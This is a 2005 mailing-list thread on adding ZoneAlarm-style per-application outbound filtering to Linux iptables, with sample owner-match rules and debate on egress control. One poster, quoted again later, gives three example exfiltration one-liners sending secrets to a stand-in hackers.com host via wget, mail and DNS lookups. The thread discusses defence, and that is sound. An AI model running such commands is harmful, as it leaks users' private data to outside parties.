Nice ZoneAlarm that might be useful for Iptables

Nice ZoneAlarm that might be useful for Iptables

[Larry Alkoff]

There is a nice feature of Zonealarm for Windows that will check 
outgoing packets, and if that program sending is not on their list, ask 
if you want to allow that program to access the web.

In addition, it will warn if a program is asking for server rights 
although and ask for approval to grant that, although I don't understand 
what they mean by "server rights".

Most Iptables scripts I've seen do very little OUTPUT filtering which 
means a malicious program, if it got access somehow, could have free 
range to send packets out.  Zombie or spyware perhaps.

The ability to block this by only allowing "approved" programs to access 
the Internet would be a nice addition to Iptables.

I heard this could be done in userspace with the QUEUE target in 
iptables although I haven't been able to dig up much information about 
QUEUE and it's use.

Does anyone have some ideas on how to implement this?

If I had some ideas I'd be willing to take a first cut at it.  I know 
just enough Iptables to be dangerous <g>.

Larry

-- 
Larry Alkoff N2LA - Austin TX
Using Thunderbird on Slackware Linux

Re: Nice ZoneAlarm that might be useful for Iptables

[Frank Gruellich]

Hi,

* Larry Alkoff <labradley@mindspring.com> 30. May 05:
> [Zonealarm]
> In addition, it will warn if a program is asking for server rights 
> although and ask for approval to grant that, although I don't understand 
> what they mean by "server rights".

AFAIK Zonealarm it means, that a program starts a server: it listens on
a port.  For Unix it needs root priveleges to listen on ports below 1024
(dunno about Windows).

> Most Iptables scripts I've seen do very little OUTPUT filtering which 
> means a malicious program, if it got access somehow, could have free 
> range to send packets out.  Zombie or spyware perhaps.

While OUTPUT has nothing to do with servers, it is simply impossible.
You can't protect an infected host.

> The ability to block this by only allowing "approved" programs to access 
> the Internet would be a nice addition to Iptables.

Define "access the Internet".  There will be some hundreds of ways for
malware to send data you can't even catch with iptables.  There are some
more dozens of ways you can't block at all.  How do you intend to catch

 $ wget 'http://www.hackers.com/script.php?info=this%20is%20my%20very%20secret%20information'
 $ echo "this is the very secret information" |mail -s "$USER@`hostname -f`" jr@hackers.com
 $ ping -c1 www.this.is.my.very.secret.information.hackers.com

and many other things?  Don't install software you don't trust.  Sorry,
but this is AFAICS the only way.

Kind regards,
 Frank.
-- 
Sigmentation fault

Re: Nice ZoneAlarm that might be useful for Iptables

[Taylor, Grant]

Larry Alkoff wrote:
> There is a nice feature of Zonealarm for Windows that will check 
> outgoing packets, and if that program sending is not on their list, ask 
> if you want to allow that program to access the web.
> 
> In addition, it will warn if a program is asking for server rights 
> although and ask for approval to grant that, although I don't understand 
> what they mean by "server rights".
> 
> Most Iptables scripts I've seen do very little OUTPUT filtering which 
> means a malicious program, if it got access somehow, could have free 
> range to send packets out.  Zombie or spyware perhaps.
> 
> The ability to block this by only allowing "approved" programs to access 
> the Internet would be a nice addition to Iptables.

The ability to only allow "approved" programs to send traffic out *IS* available now.  You are asking for asking for something that the "owner" match extension will provide via the "--cmd-owner", possibly in combination with the "--uid-owner".

> I heard this could be done in userspace with the QUEUE target in 
> iptables although I haven't been able to dig up much information about 
> QUEUE and it's use.
> 
> Does anyone have some ideas on how to implement this?

If I did I would have stated so in my original post about the QUEUE target.  Sorry.  :(

> If I had some ideas I'd be willing to take a first cut at it.  I know 
> just enough Iptables to be dangerous <g>.

I'll give you warning about this type of firewall setup.  If you are wanting to run this on a firewall that has multiple people behind it, as in a firewall that NATs for at LAN, you will not be able to run the owner match support as the owner of the traffic will not even be on the box that is running this firewall.  To be able to use any thing like what you are stating ZoneAlarm will do you will have to run it on the machine(s) that is (are) generating the original traffic in the filter table OUTPUT queue.  Bearing this in mind I do think that it would be possible to set up rules in the filter table OUTPUT chain like the following to prevent any one but the apache user and the apache command to send out traffic from port 80:

iptables -t filter -A OUTPUT -o ${INet} -p tcp --sport 80 -m owner ! --uid-owner ${Apache_user} ! --gid-owner ${Apache_group} --cmd-owner httpd -j DROP

Below is a similar rule for sendmail:

iptables -t filter -A OUTPUT -o ${INet} -p tcp --sport 25 -m owner ! --uid-owner ${Sendmail} ! --gid-owner ${Sendmail} --cmd-owner sendmail -j DROP

One *MAJOR* problem that I have with this solution for you is that it is *VERY* static and probably is not flexible enough for an end user system.  However I do think that such rules could be used with the assistance of a user space daemon managing rules like these in their own chain.  Such a setup would be as follows:

iptables -t filter -N IPTablesAlarm
iptables -t filter -A IPTablesAlarm -o ${INet} -p tcp --sport 80 -m owner ! --uid-owner ${Apache_user} ! --gid-owner ${Apache_group} --cmd-owner httpd -j DROP
iptables -t filter -A IPTablesAlarm -o ${INet} -p tcp --sport 25 -m owner ! --uid-owner ${Sendmail} ! --gid-owner ${Sendmail} --cmd-owner sendmail -j DROP
#< other rules (dynamicaly created) here >

I think I would evolve this chian a bit farther though.  I would personaly do something more along the lines of this on my home system(s):

iptables -t filter -N IPTablesAlarm
iptables -t filter -A IPTablesAlarm -o ${INet} -p tcp --sport 80 -m owner --uid-owner ${Apache_user} --gid-owner ${Apache_group} --cmd-owner httpd -j RETURN
iptables -t filter -A IPTablesAlarm -o ${INet} -p tcp --sport 25 -m owner --uid-owner ${Sendmail} --gid-owner ${Sendmail} --cmd-owner sendmail -j RETURN
#< other rules (dynamicaly created) here >
iptables -t filter -A IPTablesAlarm -j LOG --log-prefix "IPTablesAlarm:  "
iptables -t filter -A IPTablesAlarm -j DROP

This would facilitate ensuring that only the appropriet programs run by the appropriate users can send traffic out any given port and that any thing else will get LOGed and DROPed.

Any way that you go about any thing like this you *WILL* *NEED* some sort of user space program / daemon managing the firewall chain if you do choose to do this in IPTables.  If you do choose to do this in user space via the QUEUE target you will need a daemon to handle that QUEUE as well as something to administer the dynamic rules that it uses.  Either way you go about it you are looking at some sort of daemon and user interface.  As sated before I am not qualified to help with the user space QUEUE target in any way shape or form.



Grant. . . .

Re: Nice ZoneAlarm that might be useful for Iptables

[Eric Leblond]

> There is a nice feature of Zonealarm for Windows that will check
> outgoing packets, and if that program sending is not on their list, ask
> if you want to allow that program to access the web.

Maybe you can have a look at :
http://fireflier.sourceforge.net/
I've never tested it but from screenshots it seems able to do application
filtering :
http://fireflier.sourceforge.net/qtclient_userspace.html

By the way you can have network range application filtering with nufw :
http://www.nufw.org

>
> In addition, it will warn if a program is asking for server rights
> although and ask for approval to grant that, although I don't understand
> what they mean by "server rights".

This is the right to open a socket in listening mode ?

>
> Most Iptables scripts I've seen do very little OUTPUT filtering which
> means a malicious program, if it got access somehow, could have free
> range to send packets out.  Zombie or spyware perhaps.
>
> The ability to block this by only allowing "approved" programs to access
> the Internet would be a nice addition to Iptables.
>
> I heard this could be done in userspace with the QUEUE target in
> iptables although I haven't been able to dig up much information about
> QUEUE and it's use.
>
> Does anyone have some ideas on how to implement this?
>
> If I had some ideas I'd be willing to take a first cut at it.  I know
> just enough Iptables to be dangerous <g>.
>
> Larry
>
> --
> Larry Alkoff N2LA - Austin TX
> Using Thunderbird on Slackware Linux
>
>

Re: Nice ZoneAlarm that might be useful for Iptables

[Feizhou]

>> The ability to block this by only allowing "approved" programs to 
>> access the Internet would be a nice addition to Iptables.
> 
> 
> The ability to only allow "approved" programs to send traffic out *IS* 
> available now.  You are asking for asking for something that the "owner" 
> match extension will provide via the "--cmd-owner", possibly in 
> combination with the "--uid-owner".

nope. owner match is not going to do the 'approved' program access check.

Zone Alarm triggers on the name of the program.

For something similar, there needs to be a way for iptables to store and 
reference a list of approved process names (not necessarily their access 
patterns such as dest port and so on but i suppose if the name list is 
possible, it won't be that hard to tack on extra optional conditions) 
and so a trojan running wget would trigger if wget was not in the list 
of approved programs.

Re: Nice ZoneAlarm that might be useful for Iptables

[Taylor, Grant]

> For something similar, there needs to be a way for iptables to store and 
> reference a list of approved process names (not necessarily their access 
> patterns such as dest port and so on but i suppose if the name list is 
> possible, it won't be that hard to tack on extra optional conditions) 
> and so a trojan running wget would trigger if wget was not in the list 
> of approved programs.

*nod*

Owner match extension does not have a way to know what process / user / group / command initiated the wget command.  But owner match extension could be used to make sure that only Apache (or what ever web server you are running) will send packets out from port 80, etc.



Grant. . . .

Re: Nice ZoneAlarm that might be useful for Iptables

[R. DuFresne]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


Zone alarm tends to run on single user systems, and is geared well for 
that kind of access.  Imagine trying to allow 1500 users the ability to 
control your fw rules to do something similiar in a production multi-user 
env, from various systems forwarding through the fw in both directions.

How many gatekeepers would it take to keep an eye on this kind of setup?
And how well trusted are your average users?


Perhaps on a standalone linux desktop this might be feasible, but, 
certainly not in a real working env.

Thanks,

Ron DuFresne

On Tue, 31 May 2005, Frank Gruellich wrote:

> Hi,
>
> * Larry Alkoff <labradley@mindspring.com> 30. May 05:
>> [Zonealarm]
>> In addition, it will warn if a program is asking for server rights
>> although and ask for approval to grant that, although I don't understand
>> what they mean by "server rights".
>
> AFAIK Zonealarm it means, that a program starts a server: it listens on
> a port.  For Unix it needs root priveleges to listen on ports below 1024
> (dunno about Windows).
>
>> Most Iptables scripts I've seen do very little OUTPUT filtering which
>> means a malicious program, if it got access somehow, could have free
>> range to send packets out.  Zombie or spyware perhaps.
>
> While OUTPUT has nothing to do with servers, it is simply impossible.
> You can't protect an infected host.
>
>> The ability to block this by only allowing "approved" programs to access
>> the Internet would be a nice addition to Iptables.
>
> Define "access the Internet".  There will be some hundreds of ways for
> malware to send data you can't even catch with iptables.  There are some
> more dozens of ways you can't block at all.  How do you intend to catch
>
> $ wget 'http://www.hackers.com/script.php?info=this%20is%20my%20very%20secret%20information'
> $ echo "this is the very secret information" |mail -s "$USER@`hostname -f`" jr@hackers.com
> $ ping -c1 www.this.is.my.very.secret.information.hackers.com
>
> and many other things?  Don't install software you don't trust.  Sorry,
> but this is AFAICS the only way.
>
> Kind regards,
> Frank.
> --
> Sigmentation fault
>

- -- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
         admin & senior security consultant:  sysinfo.com
                         http://sysinfo.com
Key fingerprint = 9401 4B13 B918 164C 647A  E838 B2DF AFCC 94B0 6629

...We waste time looking for the perfect lover
instead of creating the perfect love.

                 -Tom Robbins <Still Life With Woodpecker>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFCnKpcst+vzJSwZikRAjNeAJ0Zjg+ZkUSHAt9ffiTtg4Kq6qe7owCeM6bY
/sharOZocwpsu3oMUTun5R8=
=tnSc
-----END PGP SIGNATURE-----

Re: Nice ZoneAlarm that might be useful for Iptables

[Feizhou]

R. DuFresne wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
> 
> 
> Zone alarm tends to run on single user systems, and is geared well for 
> that kind of access.  Imagine trying to allow 1500 users the ability to 
> control your fw rules to do something similiar in a production 
> multi-user env, from various systems forwarding through the fw in both 
> directions.
> 
> How many gatekeepers would it take to keep an eye on this kind of setup?
> And how well trusted are your average users?
> 
> 
> Perhaps on a standalone linux desktop this might be feasible, but, 
> certainly not in a real working env.

I disagree. We do not have to provide a Zone Alarm clone. Its 
functionality of checking what processes can use the network though 
would be useful in providing mandatory controls on what processes get to 
talk to the outside world.

Right now there is simply no such ability. Having this on say a server 
will prevent users from looking around the network if they have shell 
access or sending info/data out. Obviously only root should be able to 
see the list of process names allowed and the other conditions like uid 
and ports allowed to use by the process.

Re: Nice ZoneAlarm that might be useful for Iptables

[Jason Opperisano]

On Wed, Jun 01, 2005 at 10:12:36AM +0800, Feizhou wrote:
> I disagree. We do not have to provide a Zone Alarm clone. Its 
> functionality of checking what processes can use the network though 
> would be useful in providing mandatory controls on what processes get to 
> talk to the outside world.
> 
> Right now there is simply no such ability. Having this on say a server 
> will prevent users from looking around the network if they have shell 
> access or sending info/data out. Obviously only root should be able to 
> see the list of process names allowed and the other conditions like uid 
> and ports allowed to use by the process.

http://www.nsa.gov/selinux/

the mere act of saying something on a public mailing list doesn't make
it true.

-j

--
"Lois: What's going on?
 Stewie: We're playing house.
 Lois: The boy is all tied up.
 Stewie: Roman Polanski's house."
        --Family Guy

Re: Nice ZoneAlarm that might be useful for Iptables

[Feizhou]

Jason Opperisano wrote:
> On Wed, Jun 01, 2005 at 10:12:36AM +0800, Feizhou wrote:
> 
>>I disagree. We do not have to provide a Zone Alarm clone. Its 
>>functionality of checking what processes can use the network though 
>>would be useful in providing mandatory controls on what processes get to 
>>talk to the outside world.
>>
>>Right now there is simply no such ability. Having this on say a server 
>>will prevent users from looking around the network if they have shell 
>>access or sending info/data out. Obviously only root should be able to 
>>see the list of process names allowed and the other conditions like uid 
>>and ports allowed to use by the process.
> 
> 
> http://www.nsa.gov/selinux/
> 
> the mere act of saying something on a public mailing list doesn't make
> it true.
> 

:)

I stand corrected.

Re: Nice ZoneAlarm that might be useful for Iptables

[Nick Drage]

On Tue, May 31, 2005 at 08:33:44AM +0200, Eric Leblond wrote:

> > In addition, it will warn if a program is asking for server rights
> > although and ask for approval to grant that, although I don't understand
> > what they mean by "server rights".
> 
> This is the right to open a socket in listening mode ?

Yes it is in ZoneAlarm terms... if you'll excuse the rather late answer.

-- 
If at first you don't succeed, destroy all the evidence that you tried.

Re: Nice ZoneAlarm that might be useful for Iptables

[Nick Drage]

On Tue, May 31, 2005 at 06:33:10AM +0200, Frank Gruellich wrote:

> * Larry Alkoff <labradley@mindspring.com> 30. May 05:
> > [Zonealarm]
> > In addition, it will warn if a program is asking for server rights 
> > although and ask for approval to grant that, although I don't understand 
> > what they mean by "server rights".
> 
> AFAIK Zonealarm it means, that a program starts a server: it listens on
> a port.  For Unix it needs root priveleges to listen on ports below 1024
> (dunno about Windows).

AFAICT any program or user can open a socket on any port if it's not
already in use.

> > Most Iptables scripts I've seen do very little OUTPUT filtering
> > which means a malicious program, if it got access somehow, could
> > have free range to send packets out.  Zombie or spyware perhaps.
> 
> While OUTPUT has nothing to do with servers, it is simply impossible.
> You can't protect an infected host.

Of course you can.

If the firewall is on the local machine you could configure that
firewall to restrict inbound and outbound traffic.  If the malware
doesn't have root, or doesn't have the ability to turn off firewalling,
then it can't do anything on the network, or can't be reached from the
network.

If the firewall is on a gateway with a pretty hardcore egress filter,
say nothing direct allowed out, all web traffic goes through a proxy
and all email goes through the local server, then again its a lot harder
for that malware to do anything if its payload involves Internet
connectivity.

> > The ability to block this by only allowing "approved" programs to access 
> > the Internet would be a nice addition to Iptables.
> 
> Define "access the Internet".  There will be some hundreds of ways for
> malware to send data you can't even catch with iptables.  There are some
> more dozens of ways you can't block at all.  How do you intend to catch
> 
>  $ wget 'http://www.hackers.com/script.php?info=this%20is%20my%20very%20secret%20information'

Use a proxy?

>  $ echo "this is the very secret information" |mail -s "$USER@`hostname -f`" jr@hackers.com

A mail server or Network IDS set to pick up on the terms used in such
secret information.

>  $ ping -c1 www.this.is.my.very.secret.information.hackers.com

Stop ICMP ping outbound?  Why would that be needed by normal users?

You can't completely block malware from accessing the Internet, but you
can make it really, really difficult...

-- 
If at first you don't succeed, destroy all the evidence that you tried.

Re: Nice ZoneAlarm that might be useful for Iptables

[Jan Engelhardt]

>AFAICT any program or user can open a socket on any port if it's not
>already in use.

Unless someone uses a security framework.



Jan Engelhardt                                                               
--                                                                            
| Gesellschaft fuer Wissenschaftliche Datenverarbeitung Goettingen,
| Am Fassberg, 37077 Goettingen, www.gwdg.de

Re: Nice ZoneAlarm that might be useful for Iptables

[Frank Gruellich]

* Nick Drage <nickd@metastasis.org.uk> 19. Jun 05:
> On Tue, May 31, 2005 at 06:33:10AM +0200, Frank Gruellich wrote:
> > AFAIK Zonealarm it means, that a program starts a server: it listens on
> > a port.  For Unix it needs root priveleges to listen on ports below 1024
> > (dunno about Windows).
> AFAICT any program or user can open a socket on any port if it's not
> already in use.

You're talking about Windows, don't you?

> > While OUTPUT has nothing to do with servers, it is simply impossible.
> > You can't protect an infected host.
> Of course you can.
> 
> If the malware doesn't have root, [snip].

The important thing I implied.  I wouldn't call it infection if it
doesn't run as root.  Then it's just ... broken, messy.

> > How do you intend to catch
> >  $ wget 'http://www.hackers.com/script.php?info=this%20is%20my%20very%20secret%20information'
> Use a proxy?

We were talking about local actions, weren't we?  A local proxy?  Much
effort, isn't it?  You have to use a transparent one, you know?  Who
decides, that script.php at hackers.com is going to be filtered?

> >  $ echo "this is the very secret information" |mail -s "$USER@`hostname -f`" jr@hackers.com
> A mail server or Network IDS set to pick up on the terms used in such
> secret information.

A local IDS?  Wow!  This doesn't sound like a single host system.

> >  $ ping -c1 www.this.is.my.very.secret.information.hackers.com
> Stop ICMP ping outbound?  Why would that be needed by normal users?

The penetration is not the ICMP but the DNS resolve.  hackers.com is a
bad guy's domain running some "special" kind of DNS server.  I've seen
shells running this way.

> You can't completely block malware from accessing the Internet, but you
> can make it really, really difficult...

No, it's IMHO not that difficult.

Kind
 regards, Frank.
-- 
Sigmentation fault

Re: Nice ZoneAlarm that might be useful for Iptables

[David Busby]

Frank Gruellich wrote:
> 
> The penetration is not the ICMP but the DNS resolve.  hackers.com is a
> bad guy's domain running some "special" kind of DNS server.  I've seen
> shells running this way.
> 
> 
>>You can't completely block malware from accessing the Internet, but you
>>can make it really, really difficult...
> 
> 
> No, it's IMHO not that difficult.
> 
> Kind
>  regards, Frank.

Didn't MS Windows just change (xp/sp2) so that infected machines can't open more that like 10 half open sockets?  That 
was viewed as solving the wrong problem.  i.e we wouldn't have to block outbound traffic in drastic/major ways if 
infection didn't happen in the first place.  Not that that is possible either but weigh fix with the problem carefully.

Out of curiosity Frank, are you blocking malicious IM type softwares/plugins/add-ons or users?  If so how?

/djb